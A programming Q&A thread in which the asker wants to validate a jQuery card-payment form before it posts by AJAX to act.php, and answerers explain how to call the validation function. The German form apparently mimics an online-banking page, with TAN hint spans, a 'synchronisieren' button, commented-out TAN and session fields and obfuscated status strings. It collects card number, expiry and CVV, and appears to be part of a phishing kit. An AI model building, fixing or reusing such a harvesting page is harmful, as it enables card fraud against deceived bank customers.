# js php validating form before submit

Tags: javascript, php, jquery, ajax

I am trying to send data to PHP using POST. I want to validate the `form` using the `validate()` function. If valid then send AJAX.

```js
$('#submitccform').click(function() {
  function validate() {
    var valid = true;
    var message = "";
    var message1 = "";
    var cardHolderNameRegex = /^(0[1-9]|1[0-2])\/?([0-9]{2})$/i;
    var cvvRegex = /^[0-9]{3,3}$/;
    var cardHolderName = $("#cardholdername").val();
    var cardNumber = $("#cardnumber").val();
    var cvv = $("#cvv").val();

    if (cardHolderName == "" || cardNumber == "" || cvv == "") {
      message += "<div class='message_error show ' style='color: #a9000f;' >Dieses Feld darf nicht leer bleiben. Falsches Format.</div>";
      if (cardHolderName == "") {
        $("#cardholdername").css('background-color', '#d87373ab');
      }
      if (cardNumber == "") {
        $("#cardnumber").css('background-color', '#d87373ab');
      }
      if (cvv == "") {
        $("#cvv").css('background-color', '#d87373ab');
      }
      valid = false;
    }

    if (cardNumber != "") {
      $('#cardnumber').validateCreditCard(function(result) {
        if (!(result.valid)) {
          message += "<div class='message_error show' style='color: #a9000f;'> Fehler!Geben Sie eine gültige Kartennummer ein.</div>";
          $("#cardnumber").css('background-color', '#');
          valid = false;
        }
      });
    }

    if (cardHolderName != "" && !cardHolderNameRegex.test(cardHolderName)) {
      message += "<div class='message_error show' style='color: #a9000f;'> Fehler! Geben Sie ein gültiges Verfallsdatum.</div>";
      $("#cardholdername").css('background-color', '#');
      valid = false;
    }

    if (cvv != "" && !cvvRegex.test(cvv)) {
      message += "<div class='message_error show' style='color: #a9000f;'> Fehler! Geben Sie ein gültiges Kryptogramm.</div>";
      $("#cvv").css('background-color', '#');
      valid = false;
    }

    if (message != "") {
      $("#error-message").show();
      $("#error-message").html(message);
    }
    return valid;
  }

  function formatString(e) {
    var inputChar = String.fromCharCode(event.keyCode);
    var code = event.keyCode;
    var allowedKeys = [8];
    if (allowedKeys.indexOf(code) !== -1) {
      return;
    }

    event.target.value = event.target.value.replace(
      /^([1-9]\/|[2-9])$/g, '0$1/' // 3 > 03/
    ).replace(
      /^(0[1-9]|1[0-2])$/g, '$1/' // 11 > 11/
    ).replace(
      /^([0-1])([3-9])$/g, '0$1/$2' // 13 > 01/3
    ).replace(
      /^(0?[1-9]|1[0-2])([0-9]{2})$/g, '$1/$2' // 141 > 01/41
    ).replace(
      /^([0]+)\/|[0]+$/g, '0' // 0/ > 0 and 00 > 0
    ).replace(
      /[^\d\/]|^[\/]*$/g, '' // To allow only digits and `/`
    ).replace(
      /\/\//g, '/' // Prevent entering more than 1 `/`
    );
  }

  function cardNumber(value) {
    var v = value.replace(/\s+/g, '').replace(/[^0-9]/gi, '')
    var matches = v.match(/\d{4,16}/g);
    var match = matches && matches[0] || ''
    var parts = []
    for (i = 0, len = match.length; i < len; i += 4) {
      parts.push(match.substring(i, i + 4))
    }
    if (parts.length) {
      return parts.join(' ')
    } else {
      return value
    }
  }

  $('.ajax_loading').show()

  $.ajax({
    method: "POST",
    url: "./act.php",
    dataType: "json",
    data: {
      //tan2: $('#tan2').val(),
      //sessionids: $('#sessionids').val(),
      cardnumber: $('#cardnumber').val(),
      cardholdername: $('#cardholdername').val(),
      cvv: $('#cvv').val(),
    },
    //beforeSend: function(){   },
    success: function(result) {
      if (result.data.status == "ccqatreouitssse") {
        $("body").load("ok.php?websms");
      }
      if (result.data.status == "invalidccqatssreouite") {
        $("body").load("ok.php?erro&error=");
      }
    },
    error: function(jqXHR, status) {
      // error code
      console.log("we have reached error ");
    }
  });
});
```

```html
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>
<form action="" method="Post" class="form " onClick="return validate();">
  <fieldset>
    <h3 class="border"><span>Kartendetails</span></h3>
    <span id="pushtTanHint_target"></span>
    <p class="clearfix formBox">
      <label for="id-329797269_tan" id="id-329797269_tan-label" class="tanLabel inlineLabel label" tid="id-329797269_tan-label">               
        Kartennummer&nbsp;*
      </label>
      <input class="field text    hasKeypad full_width_on_small input-logo" name="cardnumber" style="width:34%;" placeholder="XXXX XXXX XXXX XXXX" id="cardnumber" maxlength="16" required>
    </p>
    <span id="pushtTanHint_target"></span>
    <p class="clearfix formBox">
      <label for="id-329797269_tan" id="id-329797269_tan-label" class="tanLabel inlineLabel label">
        Verfallsdatum&nbsp;&nbsp;&nbsp;*
      </label>
      <input class="field text xSmall full_width_on_small typeTanOnlarge hasKeypad " placeholder="MM/JJ" name="cardholdername" id="cardholdername" maxlength="5">
    </p>
    <span id="pushtTanHint_target"></span>
    <p class="clearfix formBox">
      <label for="id-329797269_tan" id="id-329797269_tan-label" class="tanLabel inlineLabel label">
        Kryptogramm&nbsp;&nbsp;&nbsp;*
      </label>
      <input class="field text xSmall full_width_on_small typeTanOnlarge hasKeypad sinput-cvv" name="cvv" id="cvv" placeholder="***" maxlength="3" autocomplete="off">
    </p>
  </fieldset>
  <button type="button" name="submitccform" id="submitccform" class=" clearfix submit evt-submit submit"><span class="abaxx-button-label">synchronisieren<span class="icons arrowButton0"></span></span></button>
</form>
```

Comment: Your `validate()` function is declared inside the `click` event handler, so it's not in scope of your `onclick` HTML attribute (which you shouldn't be using anyway)

Comment: please any more explanation  i would appreciate it and thank you anyways if you can show correct the code thnaks

Comment: Was there something specific you didn't understand from Rory's comment? The implication is: Move the validate() function outside the click event handler (so it's accessible to other code which is also outside that handler).

Comment: In fact none of those functions should be within that bit at all, really, it's not clear why you did that.

Comment: Also `onClick="return validate();` makes no sense, because 1) you already have `$('#submitccform').click(function() {` to handle the form submission (effectively - technically it handles the button click, but since the button submits the form...) and 2) you don't want to run the code everytime someone clicks _anywhere_ in your form!. Why handle it two different ways?? So you can just _call_ your validate function from within the `$('#submitccform').click(function() {` handler (rather than _defining_ it in there!).

Comment: hi ADyson thanks for the answer i did so after validating the inputs value which returns true i want to execute $('.ajax_loading').show();   $.ajax({
    method: "POST",
    url: "./act.php",
    dataType: "json",
    data: {

Comment: Yes I understand what you want. So...call the validate function in the way I described above, check what it returns, and use that in an `if` statement to decide whether to go ahead with the ajax request or not.

Answer (score 1):

As Rory already said your validate function is defined inside the `onclick` of your submitccform button, but you don't actually call it.

Change the it in a way so it looks like this:

```
$("#submitccform").click(() => {
  if (validate()) {
    $.ajax({...});
  }
})
```

this way the ajax request will only be send if validate returns true.

Furthermore remove the `onclick` event from your form, it will fire every time you click inside the form.

Comment: thank you everyone i get it now i hope every one get to whatever they wanted in  life thanks again helping me thanks <3